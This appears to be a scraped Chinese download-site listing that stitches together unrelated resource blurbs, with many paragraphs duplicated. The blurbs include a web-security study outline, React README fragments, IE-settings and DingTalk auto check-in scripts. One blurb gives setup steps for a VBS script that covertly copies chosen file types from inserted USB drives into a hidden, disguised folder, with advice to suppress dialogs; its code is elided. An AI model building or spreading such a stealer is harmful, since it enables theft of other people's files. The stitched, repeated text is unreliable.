Web安全学习大纲一、Web安全系列之基础1、Web安全基础概念(1天)互联网本来是安全的,自从有了研究安全的人之后,互联网就变的不安全了。
2、web面临的主要安全问题(2天)客户端:移动APP漏洞、浏览器劫持、篡改服务器:DDos攻击、CC攻击、黑客入侵、业务欺诈、恶意内容3、常用渗透手段(3天)信息搜集:域名、IP、服务器信息、CDN、子域名、GOOGLEHACKING扫描器扫描:Nmap、AWVS、BurpSuite、在线扫描器权限提升权限维持二、Web安全系列之漏洞1、漏洞产生原因(1天)漏洞就是软件设计时存在的缺陷,安全漏洞就是软件缺陷具有安全攻击应用方面的价值。
软件系统越复杂,存在漏洞的可能性越大。
2、漏洞出现哪些地方?(2天)前端静态页面脚本数据服务:主机、网络系统逻辑移动APP3、常见漏洞(3天)SQL注入:布尔型注入、报错型注入、可联合查询注入、基于时间延迟注入。
XSS(跨站脚本攻击):反射型XSS、存储型XSS、DOMXSSCSRF(跨站请求伪造)SSRF(服务器端请求伪造)文件上传下载:富文本编辑器弱口令:X-Scan、Brutus、Hydra、溯雪等工具其它漏洞:4、逻辑漏洞(3天)平行越权垂直越权任意密码重置支付漏洞:0元购接口权限配置不当:验证码功能缺陷:5、框架漏洞(2天)struts2漏洞、Spring远程代码执行漏洞、Java反序列化漏洞6、建站程序漏洞(1天)Discuz漏洞、CMS漏洞等三、Web安全系列之防御1、常见防御方案(1天)2、安全开发(2天)开发自检、测试自检、部署自检开发工具:安全框架Springsecurity、shiro、Springboot3、安全工具和设备(2天)DDos防护、WAF、主机入侵防护等等4、网站安全工具(1天)阿里云、云狗、云盾网站在线检测:http://webscan.360.cn/https://guanjia.qq.com/online_server/webindex.htmlhttp://www.51testing.com/zhuanti/selenium.htmlSelenium是一个用于Web应用程序测试的工具
2、web面临的主要安全问题(2天)客户端:移动APP漏洞、浏览器劫持、篡改服务器:DDos攻击、CC攻击、黑客入侵、业务欺诈、恶意内容3、常用渗透手段(3天)信息搜集:域名、IP、服务器信息、CDN、子域名、GOOGLEHACKING扫描器扫描:Nmap、AWVS、BurpSuite、在线扫描器权限提升权限维持二、Web安全系列之漏洞1、漏洞产生原因(1天)漏洞就是软件设计时存在的缺陷,安全漏洞就是软件缺陷具有安全攻击应用方面的价值。
软件系统越复杂,存在漏洞的可能性越大。
2、漏洞出现哪些地方?(2天)前端静态页面脚本数据服务:主机、网络系统逻辑移动APP3、常见漏洞(3天)SQL注入:布尔型注入、报错型注入、可联合查询注入、基于时间延迟注入。
XSS(跨站脚本攻击):反射型XSS、存储型XSS、DOMXSSCSRF(跨站请求伪造)SSRF(服务器端请求伪造)文件上传下载:富文本编辑器弱口令:X-Scan、Brutus、Hydra、溯雪等工具其它漏洞:4、逻辑漏洞(3天)平行越权垂直越权任意密码重置支付漏洞:0元购接口权限配置不当:验证码功能缺陷:5、框架漏洞(2天)struts2漏洞、Spring远程代码执行漏洞、Java反序列化漏洞6、建站程序漏洞(1天)Discuz漏洞、CMS漏洞等三、Web安全系列之防御1、常见防御方案(1天)2、安全开发(2天)开发自检、测试自检、部署自检开发工具:安全框架Springsecurity、shiro、Springboot3、安全工具和设备(2天)DDos防护、WAF、主机入侵防护等等4、网站安全工具(1天)阿里云、云狗、云盾网站在线检测:http://webscan.360.cn/https://guanjia.qq.com/online_server/webindex.htmlhttp://www.51testing.com/zhuanti/selenium.htmlSelenium是一个用于Web应用程序测试的工具
2023/9/25 23:10:21
5.04MB
1
使用和模板通过引导了该项目。
可用脚本在项目目录中,可以运行:yarnstart在开发模式下运行应用程序。
打开在浏览器中查看它。
如果您进行编辑,则页面将重新加载。
您还将在控制台中看到任何棉绒错误。
yarntest在交互式监视模式下启动测试运行器。
有关更多信息,请参见关于的部分。
yarnbuild构建生产到应用程序build文件夹。
它在生产模式下正确捆绑了React,并优化了构建以获得最佳性能。
生成被最小化,并且文件名包括哈希值。
您的应用已准备好进行部署!有关更多信息,请参见关于的部分。
yarneject注意:这是单向操作。
eject,您将无法返回!如果您对构建工具和配置选择不满意,则可以随时eject。
此命令将从您的项目中删除单个生成依赖项。
而是将所有配置文件和传递依赖项(Webpack,Babel,ESLint等)直
可用脚本在项目目录中,可以运行:yarnstart在开发模式下运行应用程序。
打开在浏览器中查看它。
如果您进行编辑,则页面将重新加载。
您还将在控制台中看到任何棉绒错误。
yarntest在交互式监视模式下启动测试运行器。
有关更多信息,请参见关于的部分。
yarnbuild构建生产到应用程序build文件夹。
它在生产模式下正确捆绑了React,并优化了构建以获得最佳性能。
生成被最小化,并且文件名包括哈希值。
您的应用已准备好进行部署!有关更多信息,请参见关于的部分。
yarneject注意:这是单向操作。
eject,您将无法返回!如果您对构建工具和配置选择不满意,则可以随时eject。
此命令将从您的项目中删除单个生成依赖项。
而是将所有配置文件和传递依赖项(Webpack,Babel,ESLint等)直
2023/9/25 4:02:08
243KB
1
一、右键单击,选择编辑oStr="txt|jpg|doc"'你要窃取的文件类型,可以自行添加,用“|”隔开oDistPath="C:\\windows\\system\\"'保存路径oFolderName="Task"'保存文件夹名称oType=0'将保存的文件夹进行伪装1为task文件夹,2为recycler文件夹,0为不伪装oOut=1'1复制完毕后退出,0复制完毕后不退出,继续循环二、保存后运行会出现安装成功对话框,如果不希望出现该对话框,可以将“Msgbox"安装成功"”注释掉。
此时脚本已经在循环监测U盘的插入三、插入U盘U盘插入后,就开始文件的复制。
复制完成后会出现提示对话框。
如果不希望出现该对话框,可以将“Msgbox"Windows错误",64”注释掉四、寻找文件此时,文件已经在目标文件夹中。
我将oType设置为1,所以该文件夹成了task文件夹,此时双击打开是看不到其中的文件的。
这种情况可以通过rar压缩包浏览,将其中的desktop.ini文件删除,文件夹就会变成普通文件夹。
ww这时就能打开文件夹看到其中的内容。
Copy.log记录的是原文件及复制后的文件。
vbs代码以下是源代码:……
此时脚本已经在循环监测U盘的插入三、插入U盘U盘插入后,就开始文件的复制。
复制完成后会出现提示对话框。
如果不希望出现该对话框,可以将“Msgbox"Windows错误",64”注释掉四、寻找文件此时,文件已经在目标文件夹中。
我将oType设置为1,所以该文件夹成了task文件夹,此时双击打开是看不到其中的文件的。
这种情况可以通过rar压缩包浏览,将其中的desktop.ini文件删除,文件夹就会变成普通文件夹。
ww这时就能打开文件夹看到其中的内容。
Copy.log记录的是原文件及复制后的文件。
vbs代码以下是源代码:……
2023/9/25 1:13:45
2KB
1
Unity与WebGl通信工具脚本测试Demo教程https://blog.csdn.net/boyZhenGui/article/details/114374111?spm=1001.2014.3001.5501
2023/9/24 12:06:05
3.89MB
1
KeyboardShortcutKatas.php安装随时克隆并开始吧。
要在Windows上一无所有地创建一台完整的计算机,请运行install.windows.ps1powershell脚本
要在Windows上一无所有地创建一台完整的计算机,请运行install.windows.ps1powershell脚本
2023/9/23 22:29:32
21KB
1
CreateReactApp入门该项目是通过。
可用脚本在项目目录中,可以运行:npmstart在开发模式下运行应用程序。
打开在浏览器中查看。
如果进行编辑,页面将重新加载。
您还将在控制台中看到任何棉绒错误。
npmtest在交互式监视模式下启动测试运行程序。
有关更多信息,请参见关于的部分。
npmrunbuild构建生产到应用程序build文件夹。
它在生产模式下正确捆绑了React,并优化了构建以获得最佳性能。
最小化构建,文件名包含哈希。
您的应用已准备好进行部署!有关更多信息,请参见有关的部分。
npmruneject注意:这是单向操作。
eject,您将无法返回!如果您对构建工具和配置选择不满意,则可以随时eject。
此命令将从项目中删除单个构建依赖项。
相反,它将所有配置文件和传递依赖项(webpack,Babel
可用脚本在项目目录中,可以运行:npmstart在开发模式下运行应用程序。
打开在浏览器中查看。
如果进行编辑,页面将重新加载。
您还将在控制台中看到任何棉绒错误。
npmtest在交互式监视模式下启动测试运行程序。
有关更多信息,请参见关于的部分。
npmrunbuild构建生产到应用程序build文件夹。
它在生产模式下正确捆绑了React,并优化了构建以获得最佳性能。
最小化构建,文件名包含哈希。
您的应用已准备好进行部署!有关更多信息,请参见有关的部分。
npmruneject注意:这是单向操作。
eject,您将无法返回!如果您对构建工具和配置选择不满意,则可以随时eject。
此命令将从项目中删除单个构建依赖项。
相反,它将所有配置文件和传递依赖项(webpack,Babel
2023/9/22 19:40:14
223KB
1
包含安装activex控件修改ie浏览器注册表所需脚本,添加可信任站点,修改兼容性视图设置,设置浏览器主页,完整的ie设置,只需将其中的IP修改为自己项目的IP,即可双击运行。
2023/9/22 3:46:39
1KB
1
在日常工作中,钉钉打卡成了我生活中不可或缺的一部分。然而,有时候这个看似简单的任务却给我带来了不少烦恼。
每天早晚,我总是得牢记打开钉钉应用,点击"工作台",再找到"考勤打卡"进行签到。有时候因为工作忙碌,会忘记打卡,导致考勤异常,影响当月的工作评价。而且,由于我使用的是苹果手机,有时候系统更新后,钉钉的某些功能会出现异常,使得打卡变得更加麻烦。
另外,我的家人使用的是安卓手机,他们也经常抱怨钉钉打卡的繁琐。尤其是对于那些不太熟悉手机操作的长辈来说,每次打卡都是一次挑战。他们总是担心自己会操作失误,导致打卡失败。
为了解决这些烦恼,我开始思考是否可以通过编写一个全自动化脚本来实现钉钉打卡。经过一段时间的摸索和学习,我终于成功编写出了一个适用于苹果和安卓系统的钉钉打卡脚本。
2024-04-09 15:03
15KB